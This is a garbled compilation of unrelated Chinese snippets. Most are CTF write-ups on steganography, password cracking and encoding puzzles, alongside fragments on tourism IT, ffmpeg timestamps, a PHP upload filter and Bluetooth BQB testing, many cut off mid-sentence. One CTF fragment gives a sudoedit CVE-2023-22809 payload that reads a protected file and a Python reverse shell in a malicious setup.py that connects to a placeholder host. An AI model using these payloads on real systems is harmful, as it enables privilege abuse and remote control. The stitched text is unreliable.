签到flag{buu_ctf}第二题下载下来zip解压发现个gif图片,用Stegsolve.jar打开aaa.gif图片,依次点击analyse——>frameBrowserflag{he11ohongke}二维码下载解压发现一个二维码用CQR扫一下发现没有flag用binwalk进行分析看看有没有隐藏文件发现有个4number.txt文件然后进行分离得到一个zip解压发现需要密码我们利用ARCHPR.exe进行爆破得到密码：7639解压打开4number.txt得到CTF{vjpw_wnoei}你竟然赶我走下载文件解压得到一个图片打开查看hex在结尾得到flagflag{stego_is_

前言：当时比赛没有做出来现在来复现一下就当记录一下（这个思路没想到）BlackMamba：一张图片常规得分离，属性，LSB，盲水印等都尝试过无果！考点：异或解密（第一次遇到，没想到）这里放入010发现底部有沉余字符，与十进制24异或，得到压缩包这里得到压缩包然后我们使用APCH或者Ziperello爆破得到密码：1qaz@WSX这应该是一种编码咱也不知道直接随波逐流一下！德沃夏克键盘Dvorak解码（第一次见到）DASCTF{KOBE_BRYANT_8_24}总结一下：就是还是得多做题做misc思路很重要下次在遇到这种就可以多一种尝试方法了！

状态简写状态状态说明WWait没有人做这道题，你可以开始尝试SStuck题目做到一半思路卡壳FFinished完成该题1FirstBlood获得一血2SecondBlood获得二血3ThirdBlood获得三血LLackWP完成并缺少WPMisc1.F|color|题目说明：这些毫无规律的颜色中隐藏着怎样的小世界呢？解题思路：我不知道啥时候比赛，别人来问我题目我才知道的，然后就上线了，不然这题估计我一血应该没哈问题。下载好了题目，就是一张png的题目，这个像素这么多，而且无规律的颜色中，很显然就是颜色频率了。其他颜色平均都在700~800左右，直接把序号写上去，提取一下就出来图片，然后扫描二维

sudoCVE-2023-22809没有vimvi，就用原生编辑器nanoEDITOR='nano--/flag'sudoedit/etc/GAMELABpiphack可以下载任意包，考虑构造恶意的包，让他去下载直接在setup下写反弹shellimportos,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx',8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subproce

 满城春色惹人醉，恰是出游好时节。伴随春暖花开，我国旅游市场快速升温，越来越多的人开始走出家门，去追寻久违的诗和远方。根据文化和旅游部数据中心近日测算，预计2023年，我国国内旅游人数约为45.5亿人次，同比增长约80%。全国旅游市场呈现出“稳开高走，持续回暖”的态势。 为了吸引更多游客，各地开展一系列惠民措施，景区、酒店、旅行社等机构也积极推出打折套餐、秒杀抢券、福利红包等优惠活动，促使出行客流量大幅上涨。伴随客流量及访问量增加，景区票务系统也出现页面崩溃、信息填写提交超时甚至无法提交等一系列问题，一定程度上影响了游客的访问体验。如何在业务峰值期间保障系统的稳定性，提升游客体验，已成为旅游行

我正在尝试同时读取和写入由AVAssetWriter编写的H.264mov文件。我设法提取单个NAL单元，将它们打包到ffmpeg的AVPackets中，然后使用ffmpeg将它们写入另一种视频格式。它工作正常，生成的文件播放效果很好，只是播放速度不对。如何根据原始H.264数据计算正确的PTS/DTS值？或者也许存在其他获取它们的方法？这是我尝试过的:将捕获的最小/最大帧速率限制为30，并假设输出文件为30fps。事实上它的fps总是小于我设置的值。而且，我认为数据包之间的fps不是恒定的。记住每个书面样本的呈现时间戳，并假设样本一对一映射到NALU，并将保存的时间戳应用于输出数据包

一·隐写术的介绍隐写术是一门关于信息隐藏的技巧与科学，所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文叫做Steganography，来源于特里特米乌斯的一本讲述密码学与隐写术的著作Steganographia，该书书名源于希腊语，意为“隐秘书写”。二.图片隐写1.常用工具HexWorkshopStegsolveBinwalkdd命令2.查看十六进制，用HexWorkshop将图片打开，搜索flag等关键字或翻到最后，可能会出现flag3.右键属性，查看详细信息，可能会隐藏flag。 4.将文件后缀名改为zip或rar，图片可能会变成压缩包。正常的

前言虽然师傅们已经尽力了，但是没拿到前十有点可惜，题很好吃，明年再来（）关于wp：因为我没有学过misc，但是比赛的时候还是运气好出了三道，所以wp就只把做题步骤给出，也解释不出原理而且也没有复现完（），感兴趣的师傅可以看看逆向师傅懒得写wp，轻点骂，密码wp出自队里的密码爷了，我不会（）Webphp签到源码如下functionwaf($filename){$black_list=array("ph","htaccess","ini");foreach($black_listas$value){if(stristr($ext,$value)){returnfalse;}}returntrue;

题目详情： 解题步骤：（1）打开压缩包获得一个音频文件，可判断为音频隐写类题目，使用音频处理工具Audacity打开该音频文件，展示如下： （2）上方音频谱线图提示其中藏有一段摩斯密码，较宽的为“-”，窄的为“.”，中间的间隔为“/”，可以得到一段摩斯电码为：--/..-/--../../-.-/../.../--./-----/-----/-..解码后得到flag： 套上花括号flag{}提交即可。 

本文重点在hostlayer的认证，其他比如RF，linkerlayer以及profiler再论。1.安装测试软件PTS：测试BQB的ptsdongle是在蓝牙SIG官网买的，测试软件也是在BluetoothSIG官网下载安装，软件下载地址https://pts.bluetooth.com/download，PTS可以嗅探蓝牙收发的数据包，解析内容，是一个很有用的工具。 2.下载ICS:测试需要测试脚本，在蓝牙官网上https://launchstudio.bluetooth.com/，登陆到lanuchstudio去生成对应所需要的ICS文件，加载到PTS中测试。根据需求，选择对应的测试流程